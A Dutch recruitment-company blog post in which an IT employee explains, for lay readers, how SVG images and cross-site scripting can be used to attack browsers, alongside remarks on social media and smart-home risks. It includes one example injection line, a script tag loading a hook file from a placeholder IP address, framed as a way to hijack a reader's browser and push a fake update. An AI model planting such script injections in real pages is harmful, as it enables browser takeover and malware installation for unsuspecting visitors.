Cybersecurity: het gevaar van een foto

Cybersecurity: het gevaar van een foto Blogpost
669
it

Onze ICT-professional geeft tips tegen hacken 

Misschien zag je een tijd geleden het bericht voorbijkomen: internetgigant Facebook – het platform waar miljarden mensen hun hele leven op delen - werd gehackt. Maar liefst 50 miljoen accounts waren betrokken bij de security-breach. De kans dat ook jouw account ooit gehackt wordt en dat je leven te grabbel wordt gegooid, is reëel. Zelfs als je niet beschikt over een socialmedia-account, ben je volgens Niko van Hoeck maar beter op je hoede. “Het gevaar kan overal zitten, bijvoorbeeld in een foto die verstuurd wordt als SVG-bestand.”

Wat is een SVG-bestand?
“De meeste IT’ers en digital graphic designers zijn vertrouwd met SVG-bestanden. In feite is het een afbeelding opgebouwd uit code, waar je in real time zaken aan kan veranderen. Zo kan je met enkele lijnen code een afbeelding in Illustrator maken en ze met een muisklik van kleur of zelfs van vorm doen veranderen. SVG’s maken gebruik van een XML-achtige structuur die lijkt op die van een HTML-pagina. Door een klasse toe te voegen aan je afbeelding kan je ze bijvoorbeeld gaan stylen. Bovendien kan je vanuit zo’n afbeelding code runnen. En precies daar schuilt het gevaar … voor iedereen.”

Veiligheid op het internet
“Codes die gerund kunnen worden en die bereikbaar zijn voor gebruikers, vormen een potentieel risico. Zo ging het ook bij de Facebook-hack: de hackers ontdekten een stukje onbeveiligde code en gebruikten dat om de gegevens van miljoenen mensen te hacken. Dat is nu eenmaal wat hackers doen: zoeken en blijven zoeken, tot ze iets vinden dat ze kunnen misbruiken.
Zelf ben ik mij het afgelopen jaar gaan verdiepen in ethical hacking, vooral nadat ik ontdekt had hoe SQL-injection werkte. Het is nog steeds één van de meest voorkomende vulnerabilities in webapplicaties (bron: OWASP). Wat mij verbaasde, is hoe eenvoudig het is. Voor ik vertrouwd was met code, dacht ik dat hackers superintelligente wiskundige bollebozen waren. Nu zie ik zelfs mijn 15-jarige buurjongen in staat om een - weliswaar kleine en slecht beveiligde - website te hacken.”

Hacken via SVG & XSS
“Het was dan ook niet toevallig dat ik, terwijl ik met SVG aan het werken was, plots dacht: ‘Misschien kan je hacken via SVG.’ Na wat onderzoek op het internet en wat geëxperimenteer kan ik dat alleen maar bevestigen: met SVG kan je hacken. Wat mij nog het meest verbaasde, is dat het bewustzijn hierover op het internet over het algemeen beperkt is.”
“De manier waarop dat hacken gebeurt, is vrij eenvoudig. Zoals eerder gezegd kan je met een SVG-afbeelding code uitvoeren via een browser. Stel dat de makers van een website toestaan om ook SVG-foto’s te uploaden - en ze zijn zich niet bewust van de kracht van dit bestandsformaat - dan is de kans groot dat de website kwetsbaar is voor XSS. Dat is een van de technieken om gebruikers die op kwetsbare websites komen te hacken. Een eenvoudig voorbeeldje van hoe dat in zijn werk gaat, is bijvoorbeeld deze blog. Stel dat ik hier dit schrijf:

<script src="http://12.345.678.90:3000/hook.js"></script>

Dit is legitieme code die ergens opgeslagen staat, geladen wordt en door een browser geïnterpreteerd kan worden. Heeft een website geen goede beveiliging en interpreteert ze die code niet als gewone tekst, dan ben je als lezer nu gehackt. Geen nood, het feit dat je dit lijntje als code kunt lezen, betekent dat dat waarschijnlijk niet gelukt is. Bovendien verwijst de URL naar een onbestaand adres.
Maar stel dat de URL wél zou werken, dan zou ik via dit lijntje code je browser kunnen overnemen en bijvoorbeeld een bericht doen verschijnen dat vraagt om een zogenaamde chrome update te installeren. In feite zou ik daarmee een ander programma installeren, dat de deur naar jouw pc opent om die helemaal over te nemen. Zo makkelijk is het …
Deze werkwijze kan je dus ook toepassen met SVG-bestanden. In zekere zin zijn ze voor individuen gevaarlijker dan voor websites. Krijg je zo’n foto met malafide code binnen en open je hem in je webbrowser, dan krijg je misschien wel een schattige puppy te zien, maar daarachter schuilt een programma dat stiekem jouw pc wil overnemen zonder dat je het doorhebt. Het kwaad is al geschied bij het openen, tenzij je browser eerst vraagt om het script in deze afbeelding te runnen.”

Security vandaag en morgen
“Hopelijk heb je hiermee iets geleerd en denk je daar nog eens aan wanneer je op het internet surft. Het gevaar kan immers overal in zitten. Het is dan ook niet verwonderlijk dat al mijn oud-klasgenoten en ICT-collega’s maar zelden iets posten op sociale media. Toch reikt het gevaar verder dan sociale media: het betreft het hele internet en in de toekomst gaat het misschien nog verder. Vooral over de Internet of Things (apparatuur die je met internet verbindt, zoals een Smart House) heerst er op dit moment nog grote ongerustheid, want de cijfers van security breaches zijn zorgwekkend. Via fornuizen of boilers die je met wifi kan besturen, kan je bijvoorbeeld een heel huis doen afbranden. Kijk maar eens naar de Smart House scène van de serie Mr Robot. Wie denkt dat dit buitensporige fantasieën zijn, zou zich weleens grondig kunnen vergissen.
Je kan je bovendien de vraag stellen hoeveel van je leven en je privacy je uit handen wil geven aan technologie. Vooral als je weet dat die technologie overgenomen kan worden door personen met slechte bedoelingen. Stel dat we die technologie nooit helemaal waterdicht kunnen maken, ben je dan bereid het risico te nemen? Iedereen die zich bewust is van de gevaren, stelt zich die vraag weleens. En misschien jij ook, nu je dit artikel hebt gelezen.”

Benieuwd naar onze ICT vacatures? Check ze hier.
Spontaan reageren? Solliciteer via deze link!

OVER DE AUTEUR

Van Hoeck Niko

Van Hoeck Niko

Gestart in 2018 als Young Talent bij USG Professionals, is Niko gebeten door haast alles wat met zijn vakgebied te maken heeft, namelijk IT. Dit betreft het visueel creatieve gedeelte zoals het ontwerpen van schermen en de hierachter liggende gebruiksvriendelijkheid en branding. Maar ook het stevige denkwerk van de backend. Doe daar nog een aantal topics bij zoals Artificial Intelligence & Ethical hacken en je kan met hem bijna over alles van IT een gesprek aanknopen. Zeker doen!

Jouw comment

Log in om een comment toe te voegen

E-mailadres niet geverifieerd

Nog geen lid? Maak jouw profiel aan.

Recente comments